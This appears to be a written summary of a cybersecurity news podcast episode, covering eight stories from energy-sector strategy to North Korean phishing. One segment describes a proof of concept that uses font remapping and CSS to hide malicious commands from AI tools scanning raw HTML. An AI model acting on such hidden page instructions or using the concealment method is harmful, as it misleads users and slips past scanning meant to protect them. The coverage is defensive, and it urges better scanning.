Daily Cyber Threat Brief – Ep 1091 – March 18, 2026

Host: Dr. Gerald Auger ("Jerry")
Podcast: Simply Cyber Media Group
Main Theme:
Cutting through the top cyber news stories of the day relevant for security professionals, analysts, and leaders. Insightful analysis, practical takeaways, and real talk wrapping up cybersecurity headlines that matter most — all delivered in Jerry’s trademark, community-driven, high-energy style.

Episode Overview

This episode dives into eight headline infosec stories spanning critical infrastructure, collaborative threat intelligence, newly spotted attack methods, notable nation-state actions, and reflections on both industry nostalgia and career growth. Dr. Auger provides context, explains practical implications, and injects humor and authenticity while drawing on his own professional expertise and engaging the live chat community.

Key Topics & Insights

1. U.S. Department of Energy to Release First Cyber Strategy

[14:07–19:59]

• The DOE’s upcoming cyber strategy is teased, with focus on public-private partnerships and AI for defending critical infrastructure.
• Jerry’s Take:
  • The energy sector’s unique challenges (legacy tech, OT/ICS) are acknowledged.
  • While strategic plans have existed in other sectors for years (e.g., healthcare), tactical implementation guidance (like NIST SP 800-82) has been available for a decade.
  • Quote:

    “Is this moving the needle? No. Is it a good idea? Sure, sure, sure, sure. But...for the people turning wrenches and clicking keyboards, this has already been there.”

  • Strategic plans are useful for executive buy-in and funding but don’t replace hands-on action.

2. Major Tech Companies Sign Accord to Fight Scams

[19:59–26:11]

• Google, Microsoft, Meta, Amazon, OpenAI, Adobe, and Match Group commit to sharing scam-related intel and deploying shared defense tactics. Voluntary agreement, no enforcement.
• Jerry’s Take:
  • Celebrates collaboration, laments "reinventing the wheel."
  • ISACs (Information Sharing & Analysis Centers) have existed for years and cover sectors like retail.
  • Operationalizing shared threat intel is HARD — many orgs ingest data but don’t/can’t act on it due to resource and tooling gaps.
  • Quote:

    “Stop building new bridges and start repairing the existing bridges.”

    “...If I turn on a fire hose of threat intelligence telemetry and spray it at your face, are you going to do something with it?...this is why Security Operations Center analysts is a job. Because it’s hard.”

3. Rendering Web Attack Hides Malicious Commands from AI

[26:11–31:08]

• LayerX researchers showcase a PoC that uses font remapping/CSS in webpages to hide malicious commands from LLM/AI tools.
• Jerry’s Take:
  • Not new in concept — obfuscation has always been a race between adversaries and defenders.
  • Attack evades AI that scan only raw HTML, but actual malicious instructions are rebuilt/rendered for the user.
  • Calls on browser vendors (e.g., Chrome) to extend scanning to rendered JavaScript and assembled code.
  • Quote:

    “It’s trivial to fix. Okay, I guess I am saying it...We have the technology.”

4. Leaknet Ransomware Uses New "Bring Your Own Runtime" Tactic

[31:08–36:08]

• Leaknet group uses Deno runtime for in-memory JavaScript payloads, with initial access often via social engineering (“ClickFix” attack).
• Jerry’s Take:
  • Details the “ClickFix” attack: attackers trick users into running malicious PowerShell via a fake Captcha/click prompt.
  • End-user security awareness is critical, especially advising against “Windows+R, CTRL-V, Enter” when prompted.
  • Technical mitigations: disable PowerShell for non-admins via Group Policy, block known malicious IPs/Infrastucture, update IOCs.
  • Quote:

    “If you see this, don’t do it, period. Full stop...call me, I’ll come to your desk and give you a crispy high five.”

  • Shout out to classic security education: Pyramid of Pain (David Bianco).

5. EU Sanctions Iranian and Chinese Cyber Firms

[41:47–47:02]

• Sanctions against Iranian firm Emnet Pasargad and Chinese companies for attacks and "hack for hire" operations.
• Jerry’s Take:
  • Economic sanctions are a genuine tool; losing access to EU markets is real pain.
  • Draws parallels to U.S./Israel using private sector capabilities (e.g., NSA contractors, NSO Group).
  • Quote:

    “It’s not news that a government reaches into the private sector for cyber capabilities...There is enough evidence to support that they are actively involved.”

  • Four national power levers (DIME): Diplomacy, Information, Military, Economics — sanctions are economic warfare.

6. Chinese State Hackers Dwell Years in SE Asian Military Networks

[47:02–54:32]

• Unit 42 reports six-year dwell time by a China-nexus group in military organizations, focused on targeted data exfiltration and intelligence.
• Jerry’s Take:
  • “If you absolutely need to have espionage done immediately, you call China. There’s no one better.”
  • Illustrates the extreme operational patience and specific targeting of nation-state adversaries.
  • Contrasts “smash-and-grab” cybercriminals (financially motivated, noisy, fast) with state actors’ deliberate, stealthy, protracted missions.
  • Quote:

    “If you are worried about countries breaking into you, you should have a very mature cybersecurity program...low hanging fruit isn’t going to stop highly motivated, highly sophisticated threat actors.”

  • For most listeners, direct impact is low unless working national defense or affected orgs.

7. UK Cyber Monitoring Center Plans “Cyber Disaster Scale” for US

[54:32–59:42]

• UK CMC aims to quantify cyber incidents 0–5 “like earthquakes/hurricanes” and extend the reporting system to the US.
• Jerry’s Take:
  • Skeptical of utility; worried focus on “big” attacks neglects massive impact of smaller-scale hits (e.g., critical small business closures).
  • Quote:

    “The reason I don’t like this is...this loses context for smaller...targets or whatever.”

  • Will watch to see if adoption catches on; compares to other standardized metrics (e.g., CVSS v4) that didn’t reach broad industry use.

8. North Korean Spearphishers Target Kakaotalk Users

[59:42–65:56]

• North Korea-linked group uses cleverly crafted LNK-file phishing attacks, exploiting near-total Kakaotalk penetration in South Korea to achieve remote access and stage targeted malware distribution.
• Jerry’s Take:
  • Explains spear phishing and lateral worming via trusted messaging platforms (cites analog from Melissa virus in 1999 for historical context).
  • If your org (or region) uses KakaoTalk, educate end-users on these risks — old attacks repurposed for new platforms, harnessing social trust.

Memorable Moments & Community Shoutouts

• Recogntion of HaircutFish/Dan Reardon as a model cyber influencer, for “delivering value to the community” and contributing in Discord, LinkedIn, and speaking engagements [00:01–03:00].
• Encouragement for newcomers:

  “If you’re here for the first time...put in the effort to drop a #firsttimer.”

• Nostalgia Segment “Way Back Wednesday” featuring PlayStation 3, Xbox 360, Wii U as now “retro”; reminisces about childhood tech and community culture [36:45–41:47].
  • Quote:

    “For you Gen Z people, you’re living it for the first time. For some of us, we’re reliving it!”

  • Reflections on Atari 2600, classic tech.

• Live chat and mod team appreciation:

  “Mods just like throw peanuts and stuff at me and occasionally let me out. So thank you, mods.” [~12:00]

• Ongoing commitment to deliver CPE value—“Every episode is half a CPE.”
• Real-time authenticity: No scripted prep for stories—“Ain’t nobody got time for that!” [~09:00]
• Meta observations about cybersecurity education, career growth, frameworks (NIST CSF/RMF), certifications, and more during the "Jawjacking" Q&A session [65:58+].
• Notable recurring phrases:
  • “My guy,…”
  • “Cool story, bro.”
  • “If you see this, don’t do it!”

Timestamps – Important Segments

| Segment | Timestamp | |--------------------------------------------|---------------| | Introduction / Community shoutouts | 00:01–09:00 | | DOE Cyber Strategy | 14:07–19:59 | | Tech Accord Against Scams | 19:59–26:11 | | AI-evading Web Obfuscation | 26:11–31:08 | | Leaknet Ransomware (“ClickFix” attack) | 31:08–36:08 | | “Way Back Wednesday” | 36:45–41:47 | | EU Sanctions (Iran/China) | 41:47–47:02 | | Chinese SE Asia Military Espionage | 47:02–54:32 | | UK CMC—Cyber Disaster Scale | 54:32–59:42 | | North Korea KakaoTalk Phishing | 59:42–65:56 | | Live Q&A – “Jawjacking” on frameworks, certification, career questions, and more | 65:58–END |

Notable Quotes

• On energy sector strategies:

  "Is this moving the needle? No. Is it a good idea? Sure...But for the people who are turning wrenches...you can already take action." [19:24]

• On threat intel sharing in practice:

  "If I turn on a fire hose of threat intelligence telemetry and spray it at your face, are you going to do something with it?...This is why Security Operations Center analysts is a job. Because it’s hard." [25:30]

• On ransomware initial access trends:

  "If you see this, don’t do it. Period. Full stop...call me, I’ll come to your desk and give you a crispy high five." [34:48]

• On state-sponsored espionage:

  "If you absolutely need to have espionage done immediately, you call China. There’s no one better...they will slow-cook this thing and they will get in, they will do their kill chain to whatever speed it takes." [48:20 & 48:56]

• On benchmarking cyberattack “disasters”:

  "The reason I don’t like this is because this loses context for smaller...targets or whatever." [55:57]

Additional Community & Career Value

• Career encouragement:
  • Practical breakdowns of security frameworks (NIST CSF, RMF), certifications, and real-world implementation.
• Live Q&A:
  • Resource sharing: “I have a video for that…” style answers, practical advice on PhDs, certs, finding mock interviews, and handling frameworks.
  • Candid career advice: only pursue a PhD for true passion, not just advancement; Google Cyber Cert is good foundation but not job-guarantee.
• Live, unscripted energy, and humor.
• Calls for inclusivity and engagement:
  • “Thank you for being here. Long timers, first timers…”

Conclusion

A dense, energetic episode serving both daily practitioners and those entering the infosec field. Expect historic perspective (throwbacks to Melissa/CodeRed, shoutouts to old consoles), practical how-to security advice, candid hot takes on industry news (and gripes about reinventing infosec wheels), deep dives on frameworks, and a sense of supportive community.

End message: “Go forth and crush it. ... Stay secure.”